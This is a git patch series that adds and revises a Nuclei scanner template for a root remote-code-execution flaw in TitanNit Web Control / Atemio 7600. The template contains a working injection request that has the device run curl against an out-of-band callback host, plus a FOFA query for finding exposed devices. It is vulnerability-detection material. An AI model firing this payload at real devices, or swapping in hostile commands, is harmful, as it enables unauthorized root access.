From 1afbe5b1fecb81cf7f33aebf320f2a03fd37c80a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 23 Apr 2024 12:08:05 +0530 Subject: [PATCH 1/4] Create titannit-web-ssrf.yaml --- .../titan/titannit-web-ssrf.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/vulnerabilities/titan/titannit-web-ssrf.yaml diff --git a/http/vulnerabilities/titan/titannit-web-ssrf.yaml b/http/vulnerabilities/titan/titannit-web-ssrf.yaml new file mode 100644 index 0000000000..8a048edc54 --- /dev/null +++ b/http/vulnerabilities/titan/titannit-web-ssrf.yaml @@ -0,0 +1,37 @@ +id: titannit-web-ssrf + +info: + name: TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution + author: DhiyaneshDk + severity: high + description: | + The vulnerability in the device enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the 'getcommand' query within the application,allowing the attacker to gain root access. + reference: + - https://www.exploit-db.com/exploits/51853 + - https://github.com/projectdiscovery/nuclei-templates/issues/8716 + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php + - https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution + metadata: + fofa-query: title="TitanNit Web Control" + verified: true + max-request: 1 + tags: titanit,web-control,ssrf,oast,rce + +http: + - raw: + - | + @timeout: 20s + GET /query?getcommand=&cmd=curl+http://{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: body + words: + - "titan.css" From fc907a60cceb48f3f2d94ff63498e440c4d525bf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 23 Apr 2024 12:11:06 +0530 Subject: [PATCH 2/4] fix trail space --- http/vulnerabilities/titan/titannit-web-ssrf.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/titan/titannit-web-ssrf.yaml b/http/vulnerabilities/titan/titannit-web-ssrf.yaml index 8a048edc54..89fcf94bf2 100644 --- a/http/vulnerabilities/titan/titannit-web-ssrf.yaml +++ b/http/vulnerabilities/titan/titannit-web-ssrf.yaml @@ -23,7 +23,7 @@ http: @timeout: 20s GET /query?getcommand=&cmd=curl+http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} - + matchers-condition: and matchers: - type: word From 23eb53afe5074b397e01f5429c44e3bcd2f9ff9e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 23 Apr 2024 12:18:52 +0530 Subject: [PATCH 3/4] remove link --- http/vulnerabilities/titan/titannit-web-ssrf.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/vulnerabilities/titan/titannit-web-ssrf.yaml b/http/vulnerabilities/titan/titannit-web-ssrf.yaml index 89fcf94bf2..365a03d776 100644 --- a/http/vulnerabilities/titan/titannit-web-ssrf.yaml +++ b/http/vulnerabilities/titan/titannit-web-ssrf.yaml @@ -10,7 +10,6 @@ info: - https://www.exploit-db.com/exploits/51853 - https://github.com/projectdiscovery/nuclei-templates/issues/8716 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php - - https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution metadata: fofa-query: title="TitanNit Web Control" verified: true From ce27f33042c50706c005e2aea1fe198b7727c544 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Apr 2024 18:59:14 +0530 Subject: [PATCH 4/4] Update titannit-web-ssrf.yaml --- http/vulnerabilities/titan/titannit-web-ssrf.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/titan/titannit-web-ssrf.yaml b/http/vulnerabilities/titan/titannit-web-ssrf.yaml index 365a03d776..ea1097a86b 100644 --- a/http/vulnerabilities/titan/titannit-web-ssrf.yaml +++ b/http/vulnerabilities/titan/titannit-web-ssrf.yaml @@ -1,7 +1,7 @@ -id: titannit-web-ssrf +id: titannit-web-rce info: - name: TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution + name: TitanNit Web Control 2.01/Atemio 7600 Root - Remote Code Execution author: DhiyaneshDk severity: high description: | @@ -11,9 +11,9 @@ info: - https://github.com/projectdiscovery/nuclei-templates/issues/8716 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php metadata: - fofa-query: title="TitanNit Web Control" verified: true max-request: 1 + fofa-query: title="TitanNit Web Control" tags: titanit,web-control,ssrf,oast,rce http: